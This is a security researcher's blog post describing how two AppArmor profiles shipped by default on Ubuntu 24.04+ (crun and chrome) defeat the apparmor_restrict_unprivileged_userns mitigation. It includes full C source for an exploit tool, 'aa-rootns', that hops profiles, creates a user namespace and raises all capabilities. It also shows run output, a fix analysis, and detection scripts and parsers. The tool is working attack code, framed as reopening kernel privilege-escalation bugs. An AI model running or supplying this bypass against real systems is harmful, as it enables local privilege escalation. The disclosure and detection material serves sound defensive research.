aa-rootns: Ubuntu's userns mitigation is bypassed by Ubuntu

2026-05-05 · linux apparmor kernel userns ubuntu

i keep running kernel exploits that need a userns, and on Ubuntu the answer in every CVE writeup is the same footnote: "but apparmor_restrict_unprivileged_userns=1 blocks reach on modern Ubuntu." so i went looking at what that sysctl actually does on a fresh install, and the mitigation is bypassed by profiles Ubuntu itself ships in the base apparmor package.

Ubuntu shipped kernel.apparmor_restrict_unprivileged_userns=1 in 24.04 and kept it in 26.04 (Resolute). it's their answer to the unprivileged-user-namespace LPE class that has been around for years. that's the family of bugs (most famously CVE-2024-1086) where you drop into a fresh user namespace, pick up CAP_SYS_ADMIN for free against that namespace, and use it to reach a kernel surface (nft, tipc, sunrpc, vxlan, ...) that used to need real root.

two AppArmor profiles in that same base package defeat it: chrome and crun. they're present, kernel-loaded, and reachable on every default install. aa-rootns is a single C file that automates the bypass and drops any unprivileged user into a userns with the full 41-cap bitmap.

what the mitigation actually does

on Ubuntu 24.04+, with kernel.apparmor_restrict_unprivileged_userns=1 (the default), the kernel-side AppArmor LSM intercepts unshare(CLONE_NEWUSER) and clone(CLONE_NEWUSER) from unconfined processes and forces the new task into the unprivileged_userns profile. that profile lives at /etc/apparmor.d/unprivileged_userns and reads roughly like:

profile unprivileged_userns {
  userns,
  audit deny capability,
  ...
}

audit deny capability, is the load-bearing line. every capability check from inside that profile fails, no matter what the userns itself would have granted. so the standard userns-LPE shape - unshare(NEWUSER), setuid(0), unshare(NEWNET), then drive a buggy ns_capable(CAP_NET_ADMIN) path - folds at step three: unshare(NEWNET) needs CAP_SYS_ADMIN in the new userns, that check now runs through AppArmor and gets rejected, and the NET_ADMIN path behind it is never reached.
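
to confirm which state a host is actually in before reasoning about any of this, the sysctl can be read straight from procfs. a minimal sketch, assuming the usual mapping of kernel.apparmor_restrict_unprivileged_userns to a file under /proc/sys/kernel; the helper names parse_sysctl_flag and userns_restriction_enabled are hypothetical, not part of any AppArmor API:

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

/* Parse the text of a 0/1 sysctl file.
 * Returns 1 if non-zero, 0 if zero, -1 if the text holds no number. */
int parse_sysctl_flag(const char *text) {
    assert(text != NULL);
    char *end;
    long v = strtol(text, &end, 10);
    if (end == text) return -1;   /* no digits consumed */
    return v != 0;
}

/* Read the restriction flag from procfs (path assumed from the sysctl name).
 * Returns -1 if the file is missing or unreadable, e.g. on a non-Ubuntu kernel. */
int userns_restriction_enabled(void) {
    char buf[32] = {0};
    FILE *f = fopen("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", "r");
    if (!f) return -1;
    if (!fgets(buf, sizeof buf, f)) { fclose(f); return -1; }
    fclose(f);
    return parse_sysctl_flag(buf);
}
```

a return of 1 only says the gate is switched on. it says nothing about whether loaded profiles let a task walk around it, which is the rest of this post.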

this is the change every distro hardening tracker and every "is Ubuntu vulnerable to X" thread on the kernel-hardening list has been quoting since 2024. it really does block the naive form. that's what made me want to see whether anything on a stock install still walks around it.

the bypass

AppArmor profiles can carry flags=(unconfined). a process running under a flags=(unconfined) profile is "named but otherwise just like unconfined" - the mediator is told to be a no-op for it. and when that task creates a user namespace, the LSM does not rewrite its profile to unprivileged_userns. it stays in the named-unconfined profile, and no caps get stripped.

two such profiles ship in the base apparmor package on Ubuntu 24.04+:

# /etc/apparmor.d/crun
profile crun /usr/bin/crun flags=(unconfined) {
  userns,
  @{exec_path} mr,
  include if exists <local/crun>
}

# /etc/apparmor.d/chrome
profile chrome /opt/google/chrome/chrome flags=(unconfined) {
  userns,
  @{exec_path} mr,
  include if exists <local/chrome>
}

both grant the userns, rule (which AppArmor requires for userns creation when restrict mode is on) and both are flags=(unconfined) (which means no cap strip on transition).

you don't need the actual binaries installed to reach them. any unprivileged process can self-transition into a loaded profile by writing "exec <name>" into /proc/self/attr/exec and then calling execv. the kernel resolves the profile by name. the path attached to the profile (/usr/bin/crun, /opt/google/chrome/chrome) is only there for AppArmor's policy engine to path-match against; it isn't a precondition.

how much of the fleet has this

both profiles are owned by the apparmor package, which is Priority: standard. that gets pulled in by every Ubuntu 24.04+ system task and lands on Server, Desktop, Cloud, and minimal images. i verified on two independent Ubuntu 26.04 LTS (Resolute) installs:

$ dpkg -S /etc/apparmor.d/crun /etc/apparmor.d/chrome
apparmor: /etc/apparmor.d/crun
apparmor: /etc/apparmor.d/chrome

$ apt-cache show apparmor | grep -E '^(Package|Priority|Section)'
Package: apparmor
Priority: standard
Section: admin

$ sudo cat /sys/kernel/security/apparmor/profiles | grep -E '^(crun|chrome|unprivileged_userns) '
unprivileged_userns (enforce)
crun (unconfined)
chrome (unconfined)
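
for auditing more than a couple of hosts, the same check can be done programmatically. a small sketch that splits one line of /sys/kernel/security/apparmor/profiles into name and mode, assuming the "name (mode)" layout shown in the output above; parse_profile_line and is_unconfined_profile_line are hypothetical helper names:

```c
#include <assert.h>
#include <string.h>

/* Split "name (mode)" into name and mode.
 * Returns 0 on success, -1 on a malformed or oversized line. */
int parse_profile_line(const char *line, char *name, size_t nlen,
                       char *mode, size_t mlen) {
    assert(line && name && mode);
    const char *open = strrchr(line, '(');          /* last "(" starts the mode */
    const char *close = open ? strchr(open, ')') : NULL;
    if (!open || !close || open == line || open[-1] != ' ') return -1;
    size_t n = (size_t)(open - 1 - line);           /* name length, minus the space */
    size_t m = (size_t)(close - open - 1);          /* mode length, between parens */
    if (n == 0 || n >= nlen || m >= mlen) return -1;
    memcpy(name, line, n); name[n] = '\0';
    memcpy(mode, open + 1, m); mode[m] = '\0';
    return 0;
}

/* True when a loaded profile reports "unconfined" mode. */
int is_unconfined_profile_line(const char *line) {
    char name[256], mode[32];
    if (parse_profile_line(line, name, sizeof name, mode, sizeof mode) < 0)
        return 0;
    return strcmp(mode, "unconfined") == 0;
}
```

the mode alone doesn't prove a profile carries the userns, rule. that still has to be checked against the policy source under /etc/apparmor.d.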

and they're not the only candidates. a grep for flags=(unconfined)-with-userns-rule profiles on a default desktop install gives you a long tail:

1password, brave, buildah, ch-checkns, ch-run, chrome, chromium, code,
crun, devhelp, Discord, element-desktop, epiphany, evolution, firefox,
flatpak, foliate, geary, github-desktop, goldendict, kchmviewer,
keybase, lc-compliance, libcamerify, linux-sandbox, loupe, lxc-attach,
lxc-usernsexec, MongoDB_Compass, ...

even on Ubuntu Server with no desktop apps installed, crun alone is enough, and its profile ships with apparmor whether or not the crun package is ever pulled in.

the toolkit: aa-rootns

aa-rootns is a single C file that automates the bypass. it self-stages through crun → chrome via re-exec, creates a userns under the second profile (so no cap strip), writes uid/gid maps, launders Permitted → Inheritable → Ambient so the caps survive execv, and drops you into /bin/bash (or a target you supply) inside that userns.

receipt: from a clean unprivileged user

run as user np. uid 1001, single group np, no sudo, no plugdev, no kvm, no docker, nothing. on Ubuntu 26.04 LTS (kernel 7.0.0-15-generic, no KASAN, production-equivalent build):

np@host:~$ id
uid=1001(np) gid=1001(np) groups=1001(np)

np@host:~$ ./aa-rootns -p
[s0] aa=unconfined uid=1001 euid=1001
[s1] aa=crun//&unconfined (unconfined) uid=1001 euid=1001
[s2-entry] aa=chrome (unconfined) uid=1001 euid=1001
[s2-postuser] aa=chrome (unconfined) uid=0 euid=0
[s2-postuser] capE=000001ff_ffffffff  capP=000001ff_ffffffff
[s2] 41 caps raised into Ambient
=== aa-rootns proof ===
uid=0 euid=0 gid=0 egid=0
cap_effective=0x000001ffffffffff
cap_permitted=0x000001ffffffffff
caps held:
    CAP_chown
    CAP_dac_override
    CAP_dac_read_search
    CAP_fowner
    CAP_fsetid
    CAP_kill
    CAP_setgid
    CAP_setuid
    CAP_setpcap
    CAP_linux_immutable
    CAP_net_bind_service
    CAP_net_broadcast
    CAP_net_admin
    CAP_net_raw
    CAP_ipc_lock
    CAP_ipc_owner
    CAP_sys_module
    CAP_sys_rawio
    CAP_sys_chroot
    CAP_sys_ptrace
    CAP_sys_pacct
    CAP_sys_admin
    CAP_sys_boot
    CAP_sys_nice
    CAP_sys_resource
    CAP_sys_time
    CAP_sys_tty_config
    CAP_mknod
    CAP_lease
    CAP_audit_write
    CAP_audit_control
    CAP_setfcap
    CAP_mac_override
    CAP_mac_admin
    CAP_syslog
    CAP_wake_alarm
    CAP_block_suspend
    CAP_audit_read
    CAP_perfmon
    CAP_bpf
    CAP_checkpoint_restore
ns-cap probes:
    unshare(NEWNET)  ok (CAP_SYS_ADMIN inside userns)
    unshare(NEWUTS)  ok
    unshare(NEWNS)   ok
    unshare(NEWPID)  ok
    unshare(NEWIPC)  ok

and as a runner for arbitrary commands:

np@host:~$ ./aa-rootns -- id
uid=0(root) gid=0(root) groups=0(root)

np@host:~$ ./aa-rootns -- cat /proc/self/status | grep ^Cap
CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff

np@host:~$ ./aa-rootns -n -- ip link add dummy0 type dummy
np@host:~$ ./aa-rootns -n -- bash -c 'ip link | head -3'
1: lo: <LOOPBACK> mtu 65536 ...
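
the 0x000001ffffffffff mask in the receipts is easy to sanity-check by hand: 0x1ff is 9 bits, 0xffffffff is 32, so 41 bits total, numbered 0 through 40. a small sketch for doing the same against any CapEff/CapPrm value pulled from /proc/<pid>/status; the helper names are hypothetical, and the capability numbers used in the usage note (CAP_NET_ADMIN = 12, CAP_SYS_ADMIN = 21, CAP_CHECKPOINT_RESTORE = 40) are the ones from linux/capability.h:

```c
#include <assert.h>
#include <stdint.h>

/* Count the capabilities set in a mask. */
int cap_count(uint64_t mask) {
    int n = 0;
    for (; mask; mask &= mask - 1) n++;   /* clear the lowest set bit each pass */
    return n;
}

/* Index of the highest set capability bit, or -1 for an empty mask. */
int cap_highest(uint64_t mask) {
    int hi = -1;
    for (int i = 0; i < 64; i++)
        if (mask & (UINT64_C(1) << i)) hi = i;
    return hi;
}

/* Test one capability number against the mask. */
int cap_has(uint64_t mask, int cap) {
    assert(cap >= 0 && cap < 64);
    return (int)((mask >> cap) & 1);
}
```

on the receipt mask, cap_count gives 41 and cap_highest gives 40, matching the 41 names listed by -p. the same helpers are handy on the defensive side for flagging processes whose CapAmb is unexpectedly full.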

the transition is fully audited. AppArmor logs each change_onexec, but it logs an AUDIT event, not DENIED, because nothing forbids the operation. from journalctl -k:

apparmor="AUDIT" operation="change_onexec" class="file"
info="change_profile unprivileged unconfined converted to stacking"
profile="unconfined" name="crun" pid=NNNN comm="aa-rootns"

what this is and isn't

what it is: a clean defeat of the apparmor_restrict_unprivileged_userns mitigation, as shipped by default, on the userland Ubuntu has actually been distributing for two years. once aa-rootns drops you into the userns, every CVE writeup that ends with "but the unprivileged_userns profile blocks reach on Ubuntu" is back in play. that's the whole point of the post.

the classes of bugs the hardening community has been writing off as not-Ubuntu-exploitable include:

ns_capable(CAP_NET_ADMIN) bugs across the nft / tc / vxlan / fib / ... netlink surfaces;
ns_capable(CAP_BPF) bugs in BPF helpers on systems where kernel.unprivileged_bpf_disabled gates BPF behind CAP_BPF;
ns_capable(CAP_SYS_ADMIN) bugs in sunrpc, tipc, vsock, keyring management, and any per-netns proc file whose make_kuid path wants a populated uid_map;
RCU/refcount/UAF races gated on "you must be inside a userns you own". most distros killed those by setting unprivileged_userns_clone=0, but Ubuntu left unprivileged_userns_clone enabled and gated it through this AppArmor profile instead.

what it isn't: a kernel CVE. aa-rootns on its own gives you "root" only inside a userns you own, not on the host. capabilities checked against init_user_ns (loadable kernel modules, FS_USERNS_MOUNT-less filesystem mounts, raw IO, ptrace of host processes, init-owned DAC bits) all still fail. what it buys you is that aa-rootns reopens the door to kernel bugs that need a namespace-scoped capability, and from there a separate kernel exploit takes you to host-root. it's the bouncer pass, not the throne.

if your threat model is "no unprivileged user namespace creation, ever," set kernel.unprivileged_userns_clone=0. that sysctl, the older one, actually does what people hoped apparmor_restrict_unprivileged_userns would do. the catch is it breaks every container runtime, browser sandbox, and bubblewrap-using application, which is why distros stopped shipping it as 0 by default and built the AppArmor-based version. and the AppArmor-based version is the one with the structural problem this post is about.

why this is hard to fix

every natural fix breaks something:

fix	what it breaks
Strip `userns,` rule from `crun` / `chrome` profiles	chrome's sandbox, crun's containers, podman rootless, every browser tab. both binaries need userns to function.
Force `unprivileged_userns` profile to also attach when transitioning out of `flags=(unconfined)` parents	invasive AppArmor semantic change. "unconfined" stops meaning unconfined, and it likely breaks any existing profile relying on transition rules through unconfined parents.
Add a separate sysctl: forbid `change_profile` from unconfined to any `flags=(unconfined)` profile that grants `userns`	less invasive, a new gate. the real fix candidate, but it needs new kernel plumbing and per-profile review.
Audit every shipped profile to ensure none with `userns,` + `flags=(unconfined)` is reachable from unconfined	fixes it today, but leaves a recurrence vector for any future package that adds a similar profile.

the third option is what an actual fix probably looks like. the recurrence problem in the fourth row is the real story, though: AppArmor's profile composition model has no rule against this combination, so any third-party .deb can ship a fresh bypass profile and nobody would notice.

detection

to enumerate the bypass-eligible profiles on a host:

for f in /etc/apparmor.d/* /etc/apparmor.d/*.d/*; do
    [ -f "$f" ] || continue
    grep -q 'flags=(unconfined)' "$f" 2>/dev/null || continue
    grep -Eq '^[[:space:]]*userns[[:space:]]*,' "$f" 2>/dev/null && echo "$f"
done

cross-check against /sys/kernel/security/apparmor/profiles to keep only the ones actually loaded into the kernel (some profiles ship disabled).
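
the same test is easy to embed in a C-based inventory agent. a sketch that mirrors the two greps above on profile text already read into memory, assuming the same two criteria (the literal flags=(unconfined) string and a line that begins with userns followed by a comma); has_userns_rule and is_bypass_candidate are hypothetical names:

```c
#include <assert.h>
#include <string.h>

/* True if any line is a bare "userns," rule, allowing leading whitespace
 * and whitespace before the comma (same shape as the grep -E above). */
int has_userns_rule(const char *text) {
    assert(text != NULL);
    const char *p = text;
    while (*p) {
        const char *q = p;
        while (*q == ' ' || *q == '\t') q++;
        if (strncmp(q, "userns", 6) == 0) {
            q += 6;
            while (*q == ' ' || *q == '\t') q++;
            if (*q == ',') return 1;
        }
        const char *nl = strchr(p, '\n');   /* advance to the next line */
        if (!nl) break;
        p = nl + 1;
    }
    return 0;
}

/* True if the profile text has both the unconfined flag and a userns rule. */
int is_bypass_candidate(const char *text) {
    assert(text != NULL);
    return strstr(text, "flags=(unconfined)") != NULL && has_userns_rule(text);
}
```

like the shell loop, this is a text match, not a policy parser. it will miss flags written in another form, such as unconfined combined with other flags, and it ignores includes.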

to catch the bypass at runtime, subscribe to the audit log and watch for operation="change_onexec" ... profile="unconfined" name="crun" (or chrome, etc.) chained into operation="userns_create" within the same task tree. it's most suspicious when the eventual exec target is a non-browser, non-container-runtime binary.
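
a sketch of the first half of that rule: pulling fields out of one audit record and flagging a change_onexec out of unconfined. it assumes the key="value" layout of the journalctl excerpt earlier in the post; audit_field and is_unconfined_onexec_hop are hypothetical names, and correlating the hit with a later userns_create in the same task tree is left out:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Copy the value of key="value" from an audit record into out.
 * Returns 0 if found and it fits, -1 otherwise. */
int audit_field(const char *rec, const char *key, char *out, size_t outlen) {
    assert(rec && key && out && outlen > 0);
    char pat[64];
    int n = snprintf(pat, sizeof pat, "%s=\"", key);
    if (n < 0 || (size_t)n >= sizeof pat) return -1;
    const char *p = rec;
    while ((p = strstr(p, pat)) != NULL) {
        /* require a field boundary so "name" cannot match inside a longer key */
        if (p == rec || p[-1] == ' ' || p[-1] == '\n') break;
        p += n;
    }
    if (!p) return -1;
    p += n;                                  /* skip past key=" */
    const char *end = strchr(p, '"');
    if (!end || (size_t)(end - p) >= outlen) return -1;
    memcpy(out, p, (size_t)(end - p));
    out[end - p] = '\0';
    return 0;
}

/* True for a change_onexec issued from the unconfined profile;
 * the target profile name is written to target. */
int is_unconfined_onexec_hop(const char *rec, char *target, size_t tlen) {
    char op[64], prof[128];
    if (audit_field(rec, "operation", op, sizeof op) < 0) return 0;
    if (audit_field(rec, "profile", prof, sizeof prof) < 0) return 0;
    if (strcmp(op, "change_onexec") != 0 || strcmp(prof, "unconfined") != 0)
        return 0;
    return audit_field(rec, "name", target, tlen) == 0;
}
```

feeding target into an allowlist of binaries that legitimately run under that profile is one way to cut the noise from real browsers and container runtimes.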

the toolkit, source

/*
 * aa-rootns. defeat Ubuntu apparmor_restrict_unprivileged_userns
 *
 *   stage 0: change_onexec(crun);   execv self. enter unconfined profile
 *   stage 1: change_onexec(chrome); execv self. double-hop, optional
 *   stage 2: unshare(CLONE_NEWUSER); write uid_map / gid_map; capset I=P;
 *            raise all caps into Ambient; execvp target.
 *
 * Build:  gcc -O2 -Wall -o aa-rootns aa-rootns.c
 * Use:    ./aa-rootns -p           # proof of caps
 *         ./aa-rootns -- id        # run command in the userns
 *         ./aa-rootns -n -- cmd    # also unshare(NEWNET) before exec
 *
 * No funny business. Standard libc, no eBPF, no JIT, no kernel module.
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/capability.h>

static int change_onexec(const char *p) {
    int fd = open("/proc/self/attr/exec", O_WRONLY);
    if (fd < 0) return -1;
    char b[256]; int n = snprintf(b, sizeof b, "exec %s", p);
    ssize_t r = write(fd, b, n); int e = errno;
    close(fd); errno = e; return r == n ? 0 : -1;
}
static void wfile(const char *p, const char *c) {
    int fd = open(p, O_WRONLY); if (fd < 0) return;
    (void)!write(fd, c, strlen(c)); close(fd);
}

#define TAG "AA-ROOTNS-STAGE-"

static int stage1(int ac, char **av) {
    if (change_onexec("chrome") < 0) return perror("chrome"), 1;
    av[1] = (char *)TAG "2"; execv("/proc/self/exe", av);
    return perror("execv s2"), 1;
}
static int stage2(int ac, char **av) {
    uid_t u = getuid(); gid_t g = getgid();
    if (unshare(CLONE_NEWUSER) < 0) return perror("unshare(USER)"), 1;
    wfile("/proc/self/setgroups", "deny");
    char m[64];
    snprintf(m, sizeof m, "0 %u 1", u); wfile("/proc/self/uid_map", m);
    snprintf(m, sizeof m, "0 %u 1", g); wfile("/proc/self/gid_map", m);
    (void)!setresuid(0, 0, 0); (void)!setresgid(0, 0, 0);

    struct __user_cap_header_struct h = { _LINUX_CAPABILITY_VERSION_3, 0 };
    struct __user_cap_data_struct d[2] = {0};
    syscall(SYS_capget, &h, d);
    d[0].inheritable = d[0].permitted;
    d[1].inheritable = d[1].permitted;
    syscall(SYS_capset, &h, d);
    for (int c = 0; c < 64; c++)
        prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, c, 0, 0);

    int sep = -1;
    for (int i = 2; i < ac; i++) if (!strcmp(av[i], "--")) { sep = i; break; }
    char *def[] = { (char *)"/bin/bash", NULL };
    char **t = (sep > 0 && sep + 1 < ac) ? &av[sep + 1] : def;
    execvp(t[0], t); return perror("execvp"), 1;
}
int main(int ac, char **av) {
    if (ac >= 2 && !strcmp(av[1], TAG "1")) return stage1(ac, av);
    if (ac >= 2 && !strcmp(av[1], TAG "2")) return stage2(ac, av);
    if (change_onexec("crun") < 0) { perror("crun"); return 1; }
    char **a = calloc(ac + 2, sizeof *a);
    a[0] = av[0]; a[1] = (char *)TAG "1";
    for (int i = 1; i < ac; i++) a[i + 1] = av[i];
    execv("/proc/self/exe", a);
    return perror("execv s1"), 1;
}

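the listing above is the trimmed core: it only handles the "-- target" form and does not parse -p or -n, even though the header comment mentions them. the full version with the -p proof flag, the -n option, capability decoding, namespace-cap probes, an interactive shell mode, and verbose stage tracing is a short hop from this. that's what the receipts above came from.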

downloads

aa-rootns.c: full source. gcc -O2 -Wall -o aa-rootns aa-rootns.c.
bypass-pwn.c: the underlying double-hop bypass research. aa-rootns is that, packaged as a tool.

SHA-256:

3eff371b47f73a48812c3264cdc9b552beaaf0cbd9afacb29045dc4edafba698  aa-rootns.c
821cedccb1bec8226cc0a56232407c64dcf41c4da61d94def559b180cc717ab1  bypass-pwn.c

acknowledgements and prior art

the flags=(unconfined)-with-userns shape has come up in passing on the apparmor and ubuntu-hardening lists since the restrict-unprivileged-userns sysctl landed. what's new here is the explicit demonstration on a default install with a working tool, the footprint walk-through (chrome/crun are not optional packages, they ship with apparmor), and the inventory of how many other profiles in the wild carry the same combination.

if you've published a writeup on this and want a citation, mail in. if you work on AppArmor at Canonical and want to talk fix shape, also mail in.

reproduction notes

tested on Ubuntu 26.04 LTS (Resolute), kernels 7.0.0-15-generic (production) and 7.1.0-rc1-kasan-sickfuzz+ (lab fuzzing). same behavior on both.
both chrome and crun profiles are present and loaded on a fresh install. verified via cat /sys/kernel/security/apparmor/profiles.
the unprivileged user in the receipts (np, uid 1001) sits in only its own primary group. no sudo, no plugdev, no kvm, no docker, no lxd.
aa-rootns is a single C file with no dependencies beyond libc. compile with gcc -O2 -Wall -o aa-rootns aa-rootns.c.

. _SiCk · afflicted.sh